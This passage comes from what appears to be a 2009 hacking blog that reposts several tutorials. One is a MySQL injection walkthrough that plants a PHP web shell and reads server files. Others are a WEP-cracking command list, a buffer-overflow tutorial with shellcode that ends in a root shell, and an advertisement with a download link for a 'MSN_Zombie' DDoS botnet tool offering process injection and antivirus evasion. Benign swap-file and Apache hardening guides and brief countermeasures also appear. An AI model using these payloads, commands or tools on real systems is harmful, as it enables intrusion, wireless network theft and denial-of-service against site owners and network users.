* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

* 2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!

4. Execute shell commands

Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/

How To Change The Virtual Memory Swap File Size (Speed up computer, dramaticly)

2009-08-09T06:34:00.001-07:00

In this tutorial I'm going to tell you what the Swap file is and how to configure, for best performance.

The swap file (virtual memory) is disk memory that the Windows operating system uses to help manage applications when they exceed the amount of RAM configured in the computer. It's important that the swap file be allocated an amount of disk space appropriate for the amount of RAM in the computer. Opinions vary on how big the swap file should be, but most state it should be at least two or three times the size of the amount of RAM. This means if you have 512MB of RAM in the computer, the swap file should be configured to something like 1536MB of RAM. It doesn't need to be exact. The steps below show how I've allocated the swap file for My Super PC (NOT, actually the oldest computer in the world). As you can see, I've allocated about 3 times the 1024MB of RAM I have in My Super PC. If you have ample hard drive space then it's a good idea to go ahead and allocate this much space even if you have 512MB of RAM or less. That way it won't be necessary to remember to increase it should more RAM be added to the computer later.

To change the size of the swap file on Windows XP, click on the Start button and then right click on "My Computer" to bring up a small pop-up menu. On this menu, click on "Properties" to bring up the System Properties window.

The System Properties window looks like this. Click on the "Advanced" tab.

In the Performance sub-window, click on the "Settings" button.

The Performance Options window appears. Click on the "Advanced" tab.

In the Virtual memory sub-window, click on the "Change" button.

Here are the default values set by Windows XP for the amount of RAM I have in my computer.
Notice in the little window that the C: drive is highlighted showing that is the drive with the swap file, and that the size range of the swap file is also shown.

The "Custom size" option is already selected. Setting the "Initial size" and "Maximum size" to the same values increases efficiency and performance since Windows does not have to manage re-sizing the swap file.
Notice that the "Set" button - not the "Ok" button - needs to be clicked for the changes to actually be accepted.

Notice that the highlighted entry has changed to show the new configuration. Click on the "Ok" button.

Clicking on the "Ok" button again...

… and then again takes us back to the desktop.

Restart the computer for the changes to go into effect.

reference:hackforums

WEP Cracking With Backtrack 4--Simple and Easy Guide!

2009-08-06T07:38:00.001-07:00

First, you will need to have Backtrack 4 BETA which can be found here.
I use the DVD version, I find it easier. After downloading and burning BT4, you will have to put the CD in your computer, then restart. It should automatically load BT4. You will then be asked to log in...
login: root
pass: toor

After logging in, type in: startx

After that, BT4 should be up and running. Read below to see what you have to do next.

-------------------------------------------------------------------------

NOTES

These are all different colors because they coordinate with parts of the code you will have to change when typing them.

wlan0 = Interface (Examples: wlan0, ath0, eth0)

ch = The channel the target is on (Examples: 6, 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore “:”

-------------------------------------------------------------------------

WEP CRACK GUIDE

1. Boot computer with Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap

-------------------------------------------------------------------------

ALTERNATE ATTACKS

FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap

CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK

***Be sure to open new Konsoles when necessary***

-------------------------------------------------------------------------

If you don't really like this guide, please follow these videos from NICEWEBSITE to help you crack WEP!
Cracking WEP with client
or
Cracking WEP without client

MSN_Zombie Attack DDOS, MSN_Zombie Attack DDOS I

2009-08-04T06:38:00.000-07:00

MSN_Zombie Attack DDOS Introduction:

n China this is a Denial of Service DDOS stress testing software MSN_Zombie attack DDOS)

etwork traffic control and system control technology costs, speed, do not plug, hidden, and powerful attacks, such as outstanding performance characteristics, can fully exploit the weaknesses of the target audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be protective. The protection of corporate Web site or host security.

Strong performance of the attack
Support for custom packet TCP / UDP attack to attack in support of conventional host, such as multiple TCP connections / UDP floods at / ICMP / IGMP / SYN, etc. to support the Web site attacks, such as HTTP and more connected / HTTP download / FTP multi-connection / FTP download / CC attacks in support of win98/2k/xp/xp-sp2/vista system.

Automatic on-line chickens
A variety of ways to support the on-line mechanism for the broilers, such as Dynamic Domain Name / URL steering / FTP upload documents IP / fixed IP and so on, through a simple configuration can be automatically generated on the server. Server has powerful features automatic re-connection will be able to automatically search for hosts outside the network address, the automatic use of agents, to support the LAN control, never dropped.

Hidden performance
Encryptionthe protection of client services can be injected into any process, such as explorer, svchost, etc., NT system service can be generated automatically activated disguised.

First-class attack speed
Server-side part of the code directly from the completion of the compilation, in order to protect as much as possible at the same time functional compact, perfect attack speed by optimizing the speed and thread, to enhance the capacity of the best attack
Welcome to the forum: www.hackjllm.cn

Sorry for my poor english

Download Address:

http://www.hackju.cn/msn.rar

Hello, can be customized professional business version of DDOS attack code written by an independent anti-virus software can not be killed but also a more formidable power ..... super cheap price of more powerful than others are discount software cheap attacks.
Contact my MSN: hackxf@live.cn Thank you!

MSN-DDOS attack latest version of an increase of remote file management. Video surveillance. Screen monitor. Advanced features such as remote shell ...

The intensity of attacks is a free version of the times, and in support of 16 kinds of attacks.

by http://www.hackju.cn/msn.htm

reference:avhacker.com

this backtrack tutorial from my friend

2009-08-02T20:03:00.000-07:00

if you are a new to using backtrack n dont know, what you do in backtrack, u can download this tutorial....

please follow this link:

]http://www.4shared.com/file/83596689/7ec9615d/H4ck3rz_Backtrack_tutorials.html?err=no-sess

thanks my friend for sharing your knowladge.

Buffer Overflows Explained [Rev. A - 4/12/09] By: deLusion`

2009-07-31T03:01:00.000-07:00

Programmers always need to be careful when writing applications for the security of their software. Every application is vulnerable in some form, and code is always looked over. Buffer overflows are one of the most popular attacks on any application, due to the increased chance of this vulnerability being overlooked in the author’s code. Along with being popular, buffer overflow attacks are very dangerous in a system security aspect. Attackers exploiting the vulnerability can execute arbitrary code aimed to gain root privileges to the system.

Buffers, also called arrays in C/C++, are contiguous blocks of memory for storing a specific data type. An example of a buffer is shown here:

CODE

char buffer[512];

A storage type of char is assigned to the newly declared array called referred to as buffer, now has 512 bytes of allocated storage space. However, there is an issue that can arise when a buffer reaches and leaps over it's specified storage limit unchecked. This problem is what we call a buffer overflow, when blocks of memory are overwritten as a result of passing space limits. In a *nix environment, as a buffer overflow occurs we are confronted with something known as a segmentation fault, segfault for short. Segmentation faults occur when an application tries to overwrite system memory in an incorrect fashion, possibly to locations that are read-only. On a Windows OS, these errors are displayed differently with a STATUS_ACCESS_VIOLATION exception.

The most important thing to remember about buffer overflow vulnerabilities are that when successfully exploited followed by the spawn of a shell, the shell can only take the permission level of the application that was exploited. Basically, the only way to obtain root authentication on a system through a buffer overflow vulnerability is if the application being exploited is run by the root account, such as a system service. The main part to exploiting a buffer overflow vulnerability successfully is the code to be executed, also known as shellcode, or opcode. Opcodes, short for operation codes, are specific instructions to the processor, usually in machine code format. For simplicities' sake, I will not be showing you how to create your own shellcode from scratch, at least not in this specific article. I will be using sample shellcode provided by milw0rm for a simple shell spawn.

Machine code is system dependent, meaning that this shellcode is only designed to work with *nix x86 environments. If the provided shellcode doesn't work for you, take a look around on milw0rm, or any site that provides shellcode matching your system architecture.
CODE

\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80

The 22 byte shellcode presented is a set of instructions to execute a shell on the system. As said before, the shell that is spawned only gains the permissions that the application is currently running on.

The second most important part of a successful exploitation is the NOP sled. NOP’s are a machine instruction which stands for No-OPeration, all of which are skipped over by the processor until the next set of instructions are reached, basically like a stream following in one direction towards the bigger water source, or the rest of the instructions to be given. NOP’s take the form of the “\x90” hexadecimally represented opcode, and are usually required for buffer overflow exploitations. A grouping of NOP’s used in a buffer overflow attack is called a NOP sled, the name relating to the flow of the application. If a return address is set to any of the NOP’s in the group, the program flows downward until it reaches something else to execute.

An exception to the NOP sled requirement is through the usage of environment variables. System wide environment variables can be viewed through the env command. The difference of the shellcode and filename can then be calculated to find the exact location of the shellcode stored in the specified environment variable. However, this method will not be showed in detail by this article.

Last but not least, garbage data and a correct return address are required to complete a buffer overflow exploit. Garbage data is any sort of data to fill the rest of the buffer, it doesn't matter what it is as long as it is not a null byte, thus ending the string. A return address is used by the Instruction Pointer register, also known as the EIP. The EIP tells the processor which memory address to begin execution next, When a buffer is overflowed, the 4 byte EIP is written over by some of the garbage data. The EIP always points to the next instruction to be executed, which is very rewarding for us; now that we have the power to overwrite it.

Before we start, we need to change a security setting in Linux, which randomizes address space. This setting is required to be changed for basic buffer overflows, more advanced overflows can get around this safety precaution. In bash, enter the following command:

CODE

echo 0 > /proc/sys/kernel/randomize_va_space

That’s all you need to change to make this basic buffer overflow work.

Now that we know how all this works, how about we put it to good use? Let’s use this piece of vulnerable code just as an example:

vuln.c
CODE

#include

#include

#include

int copy(char *string){

char buffer[1024];

strcpy(buffer, string);

return 1;

}

int main(int argc, char *argv[]) {

copy(argv[1]);

return 1;

}

Note, if you are using Ubuntu as your OS, when compiling you must use these arguments for GCC:
CODE

-fno-stack-protector -z execstack

The first disables stack protection, the second allows the stack to be executed.

This code is not too complicated, I’m only going to stay basic with this article. In this example we have a 1024 byte buffer, with the very insecure copy() function shown above. This function uses the strcpy() function included in the string.h header, which if gone unchecked, will forcibly copy any size string from source to destination. As you have probably figured, this is not good at all, allowing anyone to overflow the buffer array. Let's get started with this simple vulnerability.

Here is the format in which you need to sort your shellcode, garbage data, and return address:
CODE

[ GARBAGE DATA ] -> [ NOP ] -> [ SHELLCODE ] -> [ RET ]

We now need to calculate the amount needed for each field, excluding the return address which is always 4 bytes.

Our buffer size is 1024 bytes, so we need to find out how much garbage data we’re going to need. Just for safe measure we’re going to use 150 NOP’s, so if we are off on the return address, we have a higher chance of hitting the sled.

1024 - 150 = 874

The example shellcode is 22 bytes.

874 - 22 = 852

The EIP needs to be overwritten so we are going to add 4 bytes.

852 + 4 = 856

Before we get started writing statements to exploit this application, I want to point this out:
CODE

delusion@deLusive:~/code/overflow$ ls -l
total 16

-rwxr-xr-x 1 root root 11997 2009-04-12 13:03 vuln

-rw-r--r-- 1 root root 212 2009-04-12 13:03 vuln.c

The owner of the file is root, so this application will be running with root privileges, simulating the effect of a real-world service being attacked by a buffer overflow exploit.

Moving onto the actual exploitation, we now know how much garbage data we’re going to use to fill most of the buffer. Let’s write a quick perl statement to do this all for us in GDB, standing for the GNU DeBugger.

CODE

perl –e’print “A”x856,”\x90”x150,”\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80”,”YYYY”’

Now we’re ready to use GDB to debug this. I set YYYY as the return address temporarily for debugging purposes.

CODE

delusion@deLusive:~/code/overflow$ gdb vuln -q
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`

Program received signal SIGSEGV, Segmentation fault.
0x59595959 in ?? ()

You might have been able to spot something all ready. 0x59 is hex for Y, which is what has corrupted the EIP. Let’s take a look at the registers.

CODE

(gdb) i r
eax 0x1 1
ecx 0xbfffeb38 -1073747144
edx 0x409 1033
ebx 0xb7fc1ff4 -1208213516
esp 0xbfffef40 0xbfffef40
ebp 0x80cde189 0x80cde189
esi 0xb8000ce0 -1207956256
edi 0x0 0
eip 0x59595959 0x59595959

As you see, the EIP was overwritten with 4 bytes of ‘Y’, now we need to find out the general location of the NOP sled to get an approximate return address.

CODE
(gdb) x/200xb $esp
……
0xbffff4b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c8: 0x41 0x41 0x41 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff500: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff508: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff510: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff518: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff520: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff528: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff530: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff538: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff540: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff548: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff550: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff558: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff560: 0x90 0xb0 0x0b 0x99 0x52 0x68 0x2f 0x2f
0xbffff568: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0xbffff570: 0xe3 0x52 0x53 0x89 0xe1 0xcd 0x80 0x59
0xbffff578: 0x59 0x59 0x59 0x00 0x43 0x50 0x4c 0x55

Notice where the NOP’s end. The first byte of data after is 0xb0, the beginning of our shellcode. The best thing to do is to get a return address to use towards the middle; I’ll use 0xbffff4f0 for this example. The x86 architecture is in Little-Endian format, which is always a good thing to remember. This means that the least significant bytes are read first, so you need to reverse that memory address. Your return address is now going to be:

CODE
\xf0\xf4\xff\xbf

Now you are all set and ready to go to initiate this attack on the vulnerable application.

CODE
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
Executing new program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
sh-3.1# whoami
root
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(au
dio),18(video),19(cdrom),26(tape),83(plugdev)
sh-3.1#

Now that wasn’t too hard, was it?

reference:r00tsecurity...

Apache 2.0 Hardening Guide

2009-07-28T05:56:00.000-07:00

Technical Reference: Apache 2.0 DMZ Secure Server Install
Overview

This document is a guide to installing and hardening an Apache 2.0 web server to common security standards. It will guide you through practical measures to harden your Apache server, by way of example.

Because a web server is often placed at the edge of the network, it is one of the most vulnerable services to attack. Therefore, it’s vital that you follow this guide to ensure that:

1) The opportunity to compromise the web server is limited

2) Should the web server be compromised, the damage potential to the rest of the network, data, and systems is limited.
1. Prepare the host operating system

1.1 Install and secure the host operating system.

Follow the hardening guidelines in the The Center for Internet Security. Hardening the host O/S ensures that, should someone compromise the security of your web server, the amount of damage that they could inflict will be minimized.

1.2 Create the directories to hold the Apache files

It’s important to separate the binaries /bin, docs (/htdocs), and logs (/logs) into separate partitions on the system. You can choose whatever root you want, but this example will use /opt/apache2 as the root directory for the Apache web server.

1.3 Create the host groups for administering and running the server.

Create a distinct group for all the users who will have permission to change the configuration, start, and stop the web server. For example, if you want to call the group “webadmin”, create it like this:

# groupadd webadmin

Create a distinct group for the web server user – no one will actually log into this group, but it will only be used to hold the userid which will run the web server. For example, if you want to call that group “webserv”, create it like this:

# groupadd webserv

Take note that you should not create a “web developer” group on this host. Since this is a hardened production host you must not provide web developers login accounts on this system. Instead, developers should deploy documents and code to the server using your code/content deployment system, such as Kintana’s Apps*Integrity.

1.4 Create an unprivileged host user id to run the server.

Never run the web server as root; if the web server is ever compromised, the attacker will have complete control over the system. Instead, the best way to reduce your exposure to attack when running a web server is to create a unique unprivileged userid for the server application. The userid nobody is often used for this purpose, but a userid and group that are unique to the web server is a more secure solution.

By default the web server uses privileged ports (port 80 and 443) and, when configured for secure operation, must have root privileges to open its log files and start the dæmon. (Therefore, the web server daemon will have to be started as “root”, unless you configure it to use a port higher than 1024.) Once the server's startup tasks are complete, all active instances can run as the unprivileged user.

Use the following command line entries as patterns for creating a group and user for the web server. Here’s an example if you were to use “webserv” as the user:

# useradd -d /opt/apache2/htdocs -g webserv -c "Web Server" webserv
1.5 Lock down the web server account

It’s important that no one can successfully execute a password guessing attack against this account, so in this step, we’ll restrict this account so that no one can log into it.

1.5.1 Issue this command to lock the password for the web server account:

# passwd –l webserv

Password changed.

1.5.2 To be sure the account is locked, issue the command:

# grep webserv /etc/shadow

…a :!: at the beginning of the line indicates that the password is locked.

1.5.3 Issue this command to remove the shell for this account:

# usermod –s /bin/false webserv

1.5.4 To be sure the account is locked, issue the command:

# grep webserv /etc/passwd

…/bin/false at the end of the line indicates that the shell is set to a non-existent shell.

1.5.5 Test the web server account to be sure you can’t login. Issue this command to try to log in:

> login webserv

2. Download and verify Apache source code

By default, web servers return information about the product and version they are running in the Server variable of the HTTP header. This information can be very useful to hackers, enabling them to target attacks to that specific server. To prevent that information from being returned from the web server, this step shows you how to modify that header and build your own copy of the web server.

Because web servers often host sensitive information, or allow users to log in with plain-text passwords, it’s important to encrypt the HTTP traffic. Therefore, this section will show you how to configure mod_ssl on your web server.

Note: Don’t build the web server on your production, hardened host. Build it on a staging or development server (with identical O/S), and then copy it to your production host.

These steps will guide you through downloading Apache source code, validating it, compiling it, and installing it. We don’t recommend use of pre-compiled or DSO versions. DSO versions may allow a hacker to introduce new “features” without having to recompile the code.

If you intend to add other module to your Apache web server installation, repeat the validation steps below for each module you add.

2.1 Download the latest version of Apache 2.0

Ensure that you retrieve the latest copy, so that you have cumulative bug fixes and security patches. You can download it from the Apache site.

From here, download four files:

1) The Apache source code itself, called something like httpd-2.0.45.tar.gz.

2) The PGP keys for the Apache signers: a file named “KEYS”

3) The PGP key for this source distribution, called something like httpd-2.0.45.tar.gz.asc

4) The MD5 checksum for this source distribution, called something like httpd-2.0.45.tar.gz.md5

wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz

wget http://www.apache.org/dist/httpd/KEYS

wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz.asc

wget http://www.apache.org/dist/httpd/httpd-2.0.45.tar.gz.md5

2.2 Verify PGP signature for the Apache source

To ensure that you have an authentic version from the Apache Group, and that it’s not been tampered with (remember, there are many mirrors from which you can download the Apache source), you should check the PGP signature. If you don’t have PGP installed on this server, you can validate these files on another machine.

a) If you don’t already have them in your PGP keyring, import the public keys from the Apache Group into your keyring:

~> pgp –ka KEYS

b) Check the PGP signature:

~> pgp httpd_2.0.45.tar.gz

…if the signature is correct, you should get something similar to this:

-- CUT --

File 'httpd-2.0.45.tar.gz.asc' has signature, but with no text.

Text is assumed to be in file 'httpd-2.0.45.tar.gz'.

Good signature from user "Justin R. Erenkrantz ".

Signature made 2003/03/31 07:49 GMT

WARNING: Because this public key is not certified with a trusted signature, it is not known with high confidence that this public key actually belongs to: "Justin R. Erenkrantz ".

The fact that it says, “Good Signature from…” is what we’re looking for here. The WARNING statement indicates that we’ve not verified this signature with a 3rd party, which is ok here.

2.3 Verify the MD5 checksum for the Apache source.

MD5 is a way to validate the integrity of the file itself, much more reliable than checksum and similar methods. Normally, mismatches in the MD5 checksum from the Apache source are the result of download errors or file corruption. If you don’t have MD5 on your system, you can download it from here.

Compare the results of these two commands – visually inspect them to ensure they match (if they don’t, download it again):

~> pwd

/usr/local/build

~> cat httpd-2.0.45.tar.gz.md5

MD5 (httpd-2.0.45.tar.gz) = 1f33e9a2e2de06da190230fa72738d75

~> md5 apache_1.3.27.tar.gz

MD5 (httpd-2.0.45.tar.gz) = 1f33e9a2e2de06da190230fa72738d75

2.4 Extract the zipped Apache source file.

Finally, you need to unzip and untar the source file.

~> /pwd

/usr/local/build

~> tar xvfz httpd-2.0.45.tar.gz

This will create a new directory under your current one, named “httpd-2.0.45”.
3. Create SSL certificates

SSL support requires an SSL library on your system, such as OpenSSL. If you’re not sure how to find and install it, look at the Apache 1.3 hardening guide. This section will walk you through configuring your SSL certificate for encrypting your HTTP traffic. It will help you build a validated certificate and install it on your web server. We’ll add the configured certificates to the Apache configuration in the next step.

3.1 Create a key and certificate request for your web server

Using OpenSSL, the following command will create a 1024-bit private key named, “private.key” and generate a certificate signing request (CSR). You need to have the CSR signed by a Certificate Authority (CA) who can validate your identity. When prompted to input information, note the answers in bold print below. (Answer the prompts with the information relevant for your server, of course).

Note: If you provide a challenge password, you will be unable to start the web server unattended. We don’t recommend providing a challenge password, just leave it blank.

~> pwd

/usr/local/build

~> openssl req -nodes -newkey rsa:1024 -keyout /usr/local/build/server.key -out /usr/local/build/server.crt

Using configuration from /usr/share/ssl/openssl.cnf

Generating a 1024 bit RSA private key

................++++++

.......++++++

writing new private key to 'server.key'

-----

You are about to be asked to enter information that will be incorporated into your certificate request.

What you are about to enter is what is called a Distinguished Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [AU]:US

State or Province Name (full name) [Some-State]:NC

Locality Name (eg, city) []:RTP

Organization Name (eg, company):XianCo Systems, Inc.

Organizational Unit Name (eg, section) []:InfoSec

Common Name (eg, YOUR name) []:xianshield.xianco.com

Email Address []:webmaster@xianshield.xianco.com

Please enter the following 'extra' attributes

to be sent with your certificate request

A challenge password []:

An optional company name []:

Most importantly, make sure your “Common Name” above matches the DNS name of your server. The locale information is less important, but we think it’s best to use the locality of the server itself.

3.2. Submit CSR for validation/signing by a CA.

Next, you need to submit your CSR for signing by a CA. This will eliminate the “warning dialog” that a browser will pop up when a user accesses your site. This is because the user’s browser has a set of trusted CAs that will prevent you from being notified if the web server’s site certificate is signed by a CA you’ve trusted in your browser already (such as Verisign or DST). In this example, we will submit the request to your company’s CA for signing. (You can use another CA if you want).

Send your request for a certificate to the CA. Include your name, your web server (Apache, in this case) your OS, and of course, the .csr (certificate signing request).

3.3 Rename your certificate files

The names aren’t important, they just have to match what’s in conf/ssl.conf. You will receive 2 files from the PKI team. The first file will be your server certificate (and will probably be named .cer), the 2nd file is the certificate chain. Here, we’ll rename them to fit what’s specified in conf/ssl.conf.

mv “XianCo CA (01-03).cer” ca.crt

mv xianshield.cer server.crt

3.4 Copy certificates to your server.

Since you received these certs via email, and they’re now sitting on your laptop, we need to copy both server.crt and ca.crt to the server. We’ll copy them up to /usr/local/build. We’ll move them both to the appropriate locations under conf/ssl.conf later.

scp *.crt xianshield:/usr/local/build/.

4. Configure and build the Apache Server

In this section, we’ll configure Apache with SSL and mod_ldap support. As of Apache V2, these are both included modules, and don’t require a separate download.

In order to customize Apache to the extent necessary, we need to download the source for the latest version of Apache. Once that’s complete, we’ll configure and test it.

4.1 Alter the Apache version

We want to remove/modify the default HTTP response header parameter for the “Server:” token to hide the identity of our web server. (You’d be surprised how many vulnerability scanners are looking for specific versions of Apache.) To do this, we must open a header file (httpd.h) prior to compiling the server. To do this, edit the ap_release.h file located in ${ApacheSrcDir}/include

~> pwd

/usr/local/build/httpd-2.0.45/include

~> vi ap_release.h

…

#define AP_SERVER_BASEVENDOR "Apache Software Foundation" ß Change this…

#define AP_SERVER_BASEPRODUCT "Apache" ß and this

These are the lines you want to change; change these to remove references to Apache. We’ll hide the actual version using the ServerTokens directive in the httpd.conf file.

Example:

#define SERVER_BASEVENDOR "Network Services"

#define SERVER_BASEPRODUCT "Networks, Inc."

4.2 Configure Apache software for compilation

There are a few standard modules that should be disabled when you set up the Apache web server.
Modules to disable

Generally, the following modules make it easier to configure/support your web server but also give too much information to attackers. We recommend that you disable the following default modules for your production server:

* info: gives out too much information about your web server to potential attackers.

* status: gives out server stats via web pages

* autoindex: provides directory listings when no index.html file is present

* imap: provides server-side mapping of index files

* include: provides server-side includes (.shtml files)

* userdir: translates URLs to user-specific directories

* auth: you won’t need it – you’ll set up authentication against LDAP via mod_ldap
Modules to enable

Here are two modules that will provide strong authentication and encryption for your web server. If you have any protected content on your web server, it’s important that you only allow your users to access it over SSL, otherwise your user passwords will be sent in clear text, subject to snooping.

* ssl: Encrypts the traffic from the browser to the web server – an important means of protecting login passwords and sensitive data.

* auth_ldap: Allows you to validate passwords against ldap.xianco.com or other LDAP.
A word about LDAP authentication

